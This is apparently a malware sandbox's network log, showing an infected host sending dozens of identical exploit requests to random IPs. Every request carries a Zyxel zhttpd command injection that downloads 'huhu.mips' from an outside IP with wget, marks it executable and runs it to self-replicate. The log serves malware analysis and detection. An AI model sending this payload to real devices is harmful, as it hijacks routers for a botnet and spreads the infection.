                                            Feb 2, 2024 06:20:59.392528057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1046192.168.2.1555998116.239.140.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392584085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1047192.168.2.1535568212.219.238.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392622948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1048192.168.2.1542964126.128.10.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392652988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1049192.168.2.153958258.17.211.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392709970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1050192.168.2.1559978216.164.10.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392740965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1051192.168.2.154767848.15.153.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392781019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1052192.168.2.154015886.76.248.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392817020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1053192.168.2.1538444219.62.7.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392864943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1054192.168.2.1552470113.72.236.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392906904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1055192.168.2.1553016180.48.94.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392930031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1056192.168.2.154216627.132.248.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392957926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1057192.168.2.1552382203.142.244.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.392991066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1058192.168.2.1533060101.60.163.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393034935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1059192.168.2.154402623.238.68.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393070936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1060192.168.2.1534172159.162.60.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393104076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1061192.168.2.154602472.29.234.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393151999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1062192.168.2.154113031.58.220.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393187046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1063192.168.2.153648472.186.67.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393215895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1064192.168.2.1537020161.201.132.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393248081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1065192.168.2.1554764154.171.151.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393285036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1066192.168.2.15371161.72.49.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393325090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1067192.168.2.155029449.166.85.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393357992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1068192.168.2.155565242.34.213.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393387079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1069192.168.2.154167667.241.196.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393415928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1070192.168.2.1559814154.210.84.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393467903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1071192.168.2.153485685.247.135.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393503904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1072192.168.2.1552400102.12.96.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393553019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1073192.168.2.1546504202.202.14.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393587112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1074192.168.2.154969012.11.219.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393641949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1075192.168.2.154260052.80.127.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393668890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1076192.168.2.153757247.225.65.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393706083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1077192.168.2.155945246.189.66.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393743992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1078192.168.2.1541442163.44.15.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393770933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1079192.168.2.1548136164.197.207.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393811941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1080192.168.2.1549648102.216.76.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393852949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1081192.168.2.1554628177.165.43.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393910885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1082192.168.2.154606843.186.195.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393928051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1083192.168.2.1539668160.173.148.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.393974066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1084192.168.2.154149291.182.126.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394012928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1085192.168.2.1553670118.215.92.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394036055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1086192.168.2.1548648191.176.141.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394081116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1087192.168.2.155529054.221.67.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394115925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1088192.168.2.1537814123.88.234.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394146919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1089192.168.2.1553808134.205.119.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394181013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1090192.168.2.15407304.77.51.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394220114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1091192.168.2.1559958176.140.61.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.394258976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1092192.168.2.1542846148.15.134.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398005009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1093192.168.2.1536952163.57.129.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398029089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1094192.168.2.1555776108.98.93.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398066998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1095192.168.2.1546918118.54.45.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398119926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1096192.168.2.1538226108.4.67.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398149014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1097192.168.2.155814052.221.9.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398202896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1098192.168.2.155042460.78.128.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398237944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1099192.168.2.154635481.222.189.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398283005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1100192.168.2.154485852.221.52.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398339987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1101192.168.2.1547006192.68.146.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398389101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1102192.168.2.154776651.170.239.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398406982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1103192.168.2.154237659.188.104.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398453951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1104192.168.2.1554830128.50.129.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398488998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1105192.168.2.155640272.77.160.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398509026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1106192.168.2.1538696219.158.86.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398570061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1107192.168.2.1550888182.199.240.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398598909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1108192.168.2.1551424221.121.220.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.398642063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1109192.168.2.1560718150.20.35.9443
                                            TimestampBytes transferredDirectionData
